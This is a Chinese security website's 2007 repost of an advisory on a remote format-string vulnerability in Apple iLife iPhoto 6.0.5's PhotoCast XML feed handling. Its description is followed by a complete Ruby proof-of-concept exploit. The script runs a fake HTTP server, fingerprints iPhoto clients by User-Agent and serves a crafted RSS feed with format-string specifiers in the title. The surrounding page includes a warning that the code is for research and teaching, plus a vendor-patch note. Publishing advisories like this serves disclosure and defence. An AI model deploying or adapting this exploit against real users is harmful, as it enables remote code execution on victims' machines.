联系站长
加入收藏
会员登陆
 您的位置: 情长在线 >> 文章文献 >> 漏洞资料 >> By 情长在线(F.N.S.T)
   □  Apple iLife iPhoto PhotoCast XML远程格式串处理漏洞   3星级
Apple iLife iPhoto PhotoCast XML远程格式串处理漏洞
[作者:佚名    转贴自:服安网    点击数:    更新时间:2007-1-11    文章录入:一生情长]
【字体:

Apple iLife iPhoto PhotoCast XML远程格式串处理漏洞

更新日期:2007-01-08

受影响系统:
Apple iLife iPhoto 6.0.5 (316)
描述:
BUGTRAQ  ID: 21871

Apple iLife iPhoto软件允许用户在网站上制作并分享照片页面。

iLife iPhoto在处理Photocast XML feed时存在格式串处理漏洞,远程攻击者可能利用此漏洞在用户机器上执行任意指令。

如果Photocast XML feed的“title”标签包含有特制的格式串标识符的话,则用户受骗订阅了该Photocast feed就会导致在客户端机器上执行任意指令。

<*来源:Kevin Finisterre (dotslash@snosoft.com)
 
  链接:http://secunia.com/advisories/23615/
        http://projects.info-pull.com/moab/MOAB-04-01-2007.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/ruby
#
# (c) 2006 LMH <lmh [at] info-pull.com>
# bug by Kevin Finisterre <kf_lists [at] digitalmunition.com>
# proof of concept for MOAB-04-01-2007
# see http://projects.info-pull.com/moab/MOAB-04-01-2007.rb

require 'socket'

IPHOTO_FEED = "<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n" +
              "<rss version=\"2.0\" xmlns:aw=\"\r\n'>http://www.apple.com/ilife/wallpapers\">\r\n" +
              "<channel>\r\n" +
              "<title>" + ("A" * 256) + "%x.%n.%n.%n.%n.%n</title>\r\n" +
              "<item>\r\n" +
              "<title>In Gruber We Trust</title>\r\n" +
              "<aw:image>http://www.digitalmunition.com/digital_munitions_detonator.jpg\r\n" +
              "</aw:image>\r\n" +
              "</item>\r\n" +
              "</channel>\r\n" +
              "</rss>\r\n"

web_port    = (ARGV[0] || 80).to_i

puts "++ Starting fake HTTP server at port #{web_port}."
web_server  = TCPServer.new(nil, web_port)
while (session = web_server.accept)
  user_agent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0]
  session.print "HTTP/1.1 200/OK\r\nServer: Unabomber/1.0\r\n"
 
  # Check if remote user-agent is iPhoto.
  if user_agent.scan(/iPhoto/).size < 1
    puts "-- User connected (#{session.peeraddr[3]}) but not running iPhoto, sending bullshit."
    session.print "Content-type: text/plain\r\n\r\n"
    session.print "All your Aunt Sophia are belong to us."
  else
    puts "++ iPhoto #{user_agent.scan(/iPhoto\/(.+?) /)[0]} user connected (#{session.peeraddr[3]}), " +
         "sending payload (#{IPHOTO_FEED.size} bytes)."
    session.print "Content-type: text/xml\r\n\r\n"
    session.print IPHOTO_FEED
  end

  session.close
end

建议:
厂商补丁:

Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.apple.com

  • 上一篇文章:微软Windows Vista的25个缺点
  • 下一篇文章:没有了
  • 发表评论   □ 告诉好友   □ 打印此文  □ 关闭窗口
     最新10篇热点文章
    2007年全球IT开销走势:安…[310]
    服务器安全检查十大要素[846]
    SYN 攻击原理以及防范技术…[207]
    识破十种电子邮件诈骗术[202]
    三大技术支撑安全内容[441]
    事故频发漏洞多 美核武器安…[195]
    07安全趋势:精准攻击增多…[220]
    黑客攻击山东省公安厅网站…[238]
    ASP.NET木马及Webshell安全…[841]
    PHP Live!多个跨站脚本漏洞…[217]
     
     最新10篇推荐文章
    移动IPv6的安全性分析[01-11]
    服务器安全检查十大要素[01-07]
    SYN 攻击原理以及防范技术…[01-07]
    ASP.NET木马及Webshell安全…[01-02]
    D-Link DWL-G132 Wireless…[11-24]
    NetGear WG311v1无线驱动超…[11-24]
    Internet Explorer COM Ob…[09-15]
    Microsoft Windows NetpIs…[09-15]
    MS06-040:Microsoft Windo…[09-15]
    MDaemon USER Pre-Authent…[09-15]
     
     相 关 文 章
      ◇  网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!)
     设为首页  加入收藏  关于本站  免费服务  广告服务   归档中心   站点地图  版权申明  联系站长  友情链接
    Copyright© 2001-2005 F.N.S.T Fineacer.Org .All Rights Reserved ICP备案:粤ICP备05002156号